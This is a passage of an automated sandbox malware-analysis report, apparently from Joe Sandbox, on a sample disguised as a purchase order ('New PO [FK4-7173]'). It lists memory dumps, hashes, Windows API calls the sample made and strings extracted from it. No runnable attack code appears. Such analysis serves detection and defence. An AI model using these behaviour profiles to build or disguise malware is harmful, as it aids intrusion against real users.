                                                                          • Opcode ID: b54c574585f553e8781628df89fd5dff7bab7d9ff986115a5baffa1a56889313
                                                                          • Instruction ID: f3487f98e1bd6e8bc9f31d5f45a51086fe96283dbe71600667b0ecf5c9e53da2
                                                                          • Opcode Fuzzy Hash: b54c574585f553e8781628df89fd5dff7bab7d9ff986115a5baffa1a56889313
                                                                          • Instruction Fuzzy Hash: 7AD14934D10B1ACACB01EBA8D950AD9F771FF95300F20C79AE50977225EB706AC9CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b66ec0e807dcb16e35e67110bb2e624e5f339aee40a150d85344125b1789bf21
                                                                          • Instruction ID: e62ee689c1a6a13469071236af5dcc4c8655d0f954260683cc5b8468a4cd3f8a
                                                                          • Opcode Fuzzy Hash: b66ec0e807dcb16e35e67110bb2e624e5f339aee40a150d85344125b1789bf21
                                                                          • Instruction Fuzzy Hash: 97A19132E00209CFCF05DFB4C84459EBBB2FFC9304B1545AAE905AB265DB31E956DB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3fcfb2f11d1ae999fdfca27479d1067c5ad855fddffa020887fab1bf1c1608a3
                                                                          • Instruction ID: ce51868660b544bba590f851dd47c11179404bb10e1537fea9674876511e2824
                                                                          • Opcode Fuzzy Hash: 3fcfb2f11d1ae999fdfca27479d1067c5ad855fddffa020887fab1bf1c1608a3
                                                                          • Instruction Fuzzy Hash: 04D12735D10B1ACACB01EBA8D950A9DF771FF95300F20C79AE50977225EB706AC9CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fbbb677ef34bfc0166061f74e8853cc593fba902cfc5558c2a1940a51c26d898
                                                                          • Instruction ID: 40a4d8ea4865ad4b6e23b05272cd8a7e5858909971bc3711f7d65f09b68b0cfc
                                                                          • Opcode Fuzzy Hash: fbbb677ef34bfc0166061f74e8853cc593fba902cfc5558c2a1940a51c26d898
                                                                          • Instruction Fuzzy Hash: 38D115F4C01746ABE714CF69E8481897BB1FBA5328B50820DDD616B2E5DBBC284BCF44
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8c90609f099a7fab061b986b404000e36da2620d9a817c66daf3e73167af4831
                                                                          • Instruction ID: dd7dda3a8dbc6809a89f33f31193f0179ec506c35a816c05b54f7cb3bcad0808
                                                                          • Opcode Fuzzy Hash: 8c90609f099a7fab061b986b404000e36da2620d9a817c66daf3e73167af4831
                                                                          • Instruction Fuzzy Hash: 46514C74E042198FCB14DFA9C9919AEFBF2BF89304F24C16AD418AB316D7309942CF61
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69aeaf989e887548e15be1966eccdd490a96c4a19745f5993b4d0d6f14de33d4
                                                                          • Instruction ID: b3e5e1637ab167db71a278041345050c5d6e2169175277167a0030c34bc7d362
                                                                          • Opcode Fuzzy Hash: 69aeaf989e887548e15be1966eccdd490a96c4a19745f5993b4d0d6f14de33d4
                                                                          • Instruction Fuzzy Hash: C3F01738948108CFCB649F94D8695F8B779FF4B321F0122F6D95E97252E72A5A118B10
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3ee8371be450ace12f62387bdd549141391e7844570a9e14c7f8349c72aa9900
                                                                          • Instruction ID: 2574643674211f51d90c69c3cde2ac64c5b79f6d106a89425dd8f3672d5aa5d4
                                                                          • Opcode Fuzzy Hash: 3ee8371be450ace12f62387bdd549141391e7844570a9e14c7f8349c72aa9900
                                                                          • Instruction Fuzzy Hash: A3E0927CD0C188CFC725DB60AC641F9BB7AEF0B112F0520E5C54D93102D32859108710
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq
                                                                          • API String ID: 0-2965632952
                                                                          • Opcode ID: 885d677b09f0dec1605f73a5e7841c31737b5b2931a52355979cb37dd6bb15c2
                                                                          • Instruction ID: c65e57c5e644c259dee3b803a52b992dd8b4a3b6b93e2b66fc11540e0cd4b7c7
                                                                          • Opcode Fuzzy Hash: 885d677b09f0dec1605f73a5e7841c31737b5b2931a52355979cb37dd6bb15c2
                                                                          • Instruction Fuzzy Hash: 65126370A0021A8FDB09EF78E950B9D7B72FF90305F60866DE405AB265DB346D4ACF85
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq
                                                                          • API String ID: 0-2965632952
                                                                          • Opcode ID: 690a0831b0b765dea084c07b19a7423391782ad2ab84e5c855ef52b60ff24907
                                                                          • Instruction ID: ad501ba9222acb24cbde64eb56d656b92d3fe1e8184f65ce1f606e871f1f94cc
                                                                          • Opcode Fuzzy Hash: 690a0831b0b765dea084c07b19a7423391782ad2ab84e5c855ef52b60ff24907
                                                                          • Instruction Fuzzy Hash: D0126370A0021A8FDB09EF78E950B9D7B72FF90305F60866DE405AB265DB346D4ACF85
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'cq$Hgq$$cq$$cq
                                                                          • API String ID: 0-2640332919
                                                                          • Opcode ID: 349faf7c4b5efb3e2d2ea2c7b4def6192ffdf91dc7b713e4fc861d805f92dc0e
                                                                          • Instruction ID: f9cf0400a246b0a9190198f7cdbfaaf0f1de7a70013faec730ee5544c5aebcdb
                                                                          • Opcode Fuzzy Hash: 349faf7c4b5efb3e2d2ea2c7b4def6192ffdf91dc7b713e4fc861d805f92dc0e
                                                                          • Instruction Fuzzy Hash: 4551A3F97001568FDB59AA39592427F2EE7AFC56417198729DC03CB3D1DF28CC0287A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \;cq$\;cq$\;cq$\;cq
                                                                          • API String ID: 0-2961067002
                                                                          • Opcode ID: 433e2a0a723ae4c4c0c5f1dd4eb6a749d32e0ca032117cdd9bd974735e0614ca
                                                                          • Instruction ID: 446a3f7d39d6e226216a525e6e6d0cbcca8f1b6663d2dd7c9bd885d6630b87ce
                                                                          • Opcode Fuzzy Hash: 433e2a0a723ae4c4c0c5f1dd4eb6a749d32e0ca032117cdd9bd974735e0614ca
                                                                          • Instruction Fuzzy Hash: CA0184B17101168FCB649E2DC84092B77E7AFC96607255269E912CB3A0FB71DC6187D1

                                                                          Execution Graph

                                                                          Execution Coverage:1.2%
                                                                          Dynamic/Decrypted Code Coverage:5.1%
                                                                          Signature Coverage:8%
                                                                          Total number of Nodes:137
                                                                          Total number of Limit Nodes:9

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 314 417a53-417a6f 315 417a77-417a7c 314->315 316 417a72 call 42f533 314->316 317 417a82-417a90 call 42fb33 315->317 318 417a7e-417a81 315->318 316->315 321 417aa0-417ab1 call 42dfd3 317->321 322 417a92-417a9d call 42fdd3 317->322 327 417ab3-417ac7 LdrLoadDll 321->327 328 417aca-417acd 321->328 322->321 327->328
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AC5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 339 42c8c3-42c8fc call 404883 call 42daf3 NtClose
                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(784DRh-0,00000111,00000000,00000000), ref: 0041436A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 784DRh-0$784DRh-0
                                                                          • API String ID: 1836367815-4127946399

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(784DRh-0,00000111,00000000,00000000), ref: 0041436A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 784DRh-0$784DRh-0
                                                                          • API String ID: 1836367815-4127946399

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(784DRh-0,00000111,00000000,00000000), ref: 0041436A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 784DRh-0$784DRh-0
                                                                          • API String ID: 1836367815-4127946399

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 53 414384-41438a 54 414360 53->54 55 41438c-414399 53->55 56 414362-41436c PostThreadMessageW 54->56 57 41436e 54->57 58 41439b-41439f 55->58 56->57 61 414370-41437a 57->61 62 41437d-414383 57->62 59 4143a1-4143a6 58->59 60 4143bd-4143c3 58->60 59->60 63 4143a8-4143ad 59->63 60->58 64 4143c5-4143c8 60->64 61->62 63->60 65 4143af-4143b6 63->65 66 4143c9-4143cc 65->66 67 4143b8-4143bb 65->67 67->60 67->66
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(784DRh-0,00000111,00000000,00000000), ref: 0041436A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 784DRh-0$784DRh-0
                                                                          • API String ID: 1836367815-4127946399

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 68 4142d3-4142d7 69 4142d9-4142e4 68->69 70 41433d 68->70 71 41434c-41435d 70->71 72 41433f-414346 70->72 74 41437d-414383 71->74 75 41435f-41436e PostThreadMessageW 71->75 72->71 75->74 77 414370-41437a 75->77 77->74
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(784DRh-0,00000111,00000000,00000000), ref: 0041436A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 784DRh-0$784DRh-0
                                                                          • API String ID: 1836367815-4127946399

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 329 42cbf3-42cc37 call 404883 call 42daf3 RtlAllocateHeap
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(?,0041E83E,?,?,00000000,?,0041E83E,?,?,?), ref: 0042CC32
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 334 42cc43-42cc87 call 404883 call 42daf3 RtlFreeHeap
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,53018BFC,00000007,00000000,00000004,00000000,00417327,000000F4), ref: 0042CC82
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,687431D7,?,?,687431D7), ref: 0042CCCA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_New PO [FK4-7173].jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2160512332
                                                                          Strings
                                                                          • Thread identifier, xrefs: 011A553A
                                                                          • Critical section address, xrefs: 011A5425, 011A54BC, 011A5534
                                                                          • 8, xrefs: 011A52E3
                                                                          • double initialized or corrupted critical section, xrefs: 011A5508
                                                                          • corrupted critical section, xrefs: 011A54C2
                                                                          • undeleted critical section in freed memory, xrefs: 011A542B
                                                                          • Critical section address., xrefs: 011A5502
                                                                          • Address of the debug info found in the active list., xrefs: 011A54AE, 011A54FA
                                                                          • Critical section debug info address, xrefs: 011A541F, 011A552E
                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A54CE
                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 011A5543
                                                                          • Invalid debug info address of this critical section, xrefs: 011A54B6
                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A540A, 011A5496, 011A5519
                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011A54E2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                          • API String ID: 0-2368682639
                                                                          Strings
                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011A2409
                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011A25EB
                                                                          • @, xrefs: 011A259B
                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011A24C0
                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011A2624
                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011A22E4
                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011A2498
                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011A2602
                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 011A261F
                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011A2506
                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011A2412
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          Strings
                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 011B8A3D
                                                                          • VerifierFlags, xrefs: 011B8C50
                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 011B8A67
                                                                          • VerifierDebug, xrefs: 011B8CA5
                                                                          • AVRF: -*- final list of providers -*- , xrefs: 011B8B8F
                                                                          • HandleTraces, xrefs: 011B8C8F
                                                                          • VerifierDlls, xrefs: 011B8CBD
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                          Strings
                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01189A01
                                                                          • apphelp.dll, xrefs: 01126496
                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01189A2A
                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011899ED
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01189A11, 01189A3A
                                                                          • LdrpInitShimEngine, xrefs: 011899F4, 01189A07, 01189A30
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_1100000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          Strings
                                                                          • RtlGetAssemblyStorageRoot, xrefs: 011A2160, 011A219A, 011A21BA
                                                                          • SXS: %s() passed the empty activation context, xrefs: 011A2165
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011A21BF
